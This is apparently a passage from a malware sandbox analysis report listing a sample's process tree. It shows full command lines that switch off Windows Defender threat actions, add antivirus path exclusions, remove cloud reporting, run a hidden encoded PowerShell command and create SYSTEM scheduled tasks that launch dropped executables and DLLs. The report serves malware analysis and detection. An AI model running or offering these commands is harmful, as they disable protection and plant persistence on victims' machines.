Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NMbcPgNClKinC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NMbcPgNClKinC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\STjmdXhOU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\STjmdXhOU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YceypsUXabDXnCzNCPR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YceypsUXabDXnCzNCPR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZHcfdgyasGUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZHcfdgyasGUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gaSWcYIjjvwU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gaSWcYIjjvwU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\QPFeEjmgnBUOfRVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\QPFeEjmgnBUOfRVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nyFjvKGtfVGLAKAU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nyFjvKGtfVGLAKAU\" /t REG_DWORD /d 0 /reg:64;"3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NMbcPgNClKinC" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NMbcPgNClKinC" /t REG_DWORD /d 0 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NMbcPgNClKinC" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\STjmdXhOU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\STjmdXhOU" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YceypsUXabDXnCzNCPR" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YceypsUXabDXnCzNCPR" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZHcfdgyasGUn" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZHcfdgyasGUn" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gaSWcYIjjvwU2" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gaSWcYIjjvwU2" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\QPFeEjmgnBUOfRVB /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\QPFeEjmgnBUOfRVB /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nyFjvKGtfVGLAKAU /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nyFjvKGtfVGLAKAU /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gsaFyPMzr" /SC once /ST 16:06:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gsaFyPMzr"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gsaFyPMzr"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xsEpqqHAgqAwsAroz" /SC once /ST 05:11:21 /RU "SYSTEM" /TR "\"C:\Windows\Temp\nyFjvKGtfVGLAKAU\PmsBVDuTBNtRlfz\PovXUCA.exe\" za /site_id 668658 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "xsEpqqHAgqAwsAroz"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\Temp\nyFjvKGtfVGLAKAU\PmsBVDuTBNtRlfz\PovXUCA.exeC:\Windows\Temp\nyFjvKGtfVGLAKAU\PmsBVDuTBNtRlfz\PovXUCA.exe za /site_id 668658 /S2⤵
- Checks computer location settings
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bRciptYQhTCMvEFWGJ"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\STjmdXhOU\dxARth.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ArGDBXWmyYtLacf" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ArGDBXWmyYtLacf2" /F /xml "C:\Program Files (x86)\STjmdXhOU\MyZHJOT.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ArGDBXWmyYtLacf"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ArGDBXWmyYtLacf"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "dqMFPCMVHmhnSY" /F /xml "C:\Program Files (x86)\gaSWcYIjjvwU2\sCjgdHE.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "sOuBCsGGBJoge2" /F /xml "C:\ProgramData\QPFeEjmgnBUOfRVB\GrmGnlE.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gdlTlvZfIMOZAvCeb2" /F /xml "C:\Program Files (x86)\YceypsUXabDXnCzNCPR\hqHhhng.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PcFGIyIlUJyYablHCHc2" /F /xml "C:\Program Files (x86)\NMbcPgNClKinC\awJHiwg.xml" /RU "SYSTEM"3⤵
- Blocklisted process makes network request
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "nMmJzTJTMvgDqJXEl" /SC once /ST 08:50:40 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\nyFjvKGtfVGLAKAU\jPMmyCas\wUZkNXn.dll\",#1 /site_id 668658" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "nMmJzTJTMvgDqJXEl"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "spujSHjvBOHs" /SC once /ST 17:44:38 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\pDKMbayM\zxzLMwG.exe\" 3L /S"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "spujSHjvBOHs"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "spujSHjvBOHs"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "spujSHjvBOHs"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "xsEpqqHAgqAwsAroz"3⤵
- Blocklisted process makes network request
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\nyFjvKGtfVGLAKAU\jPMmyCas\wUZkNXn.dll",#1 /site_id 6686582⤵
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\nyFjvKGtfVGLAKAU\jPMmyCas\wUZkNXn.dll",#1 /site_id 6686583⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "nMmJzTJTMvgDqJXEl"4⤵
-
C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\pDKMbayM\zxzLMwG.exeC:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\pDKMbayM\zxzLMwG.exe 3L /S2⤵
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵
-
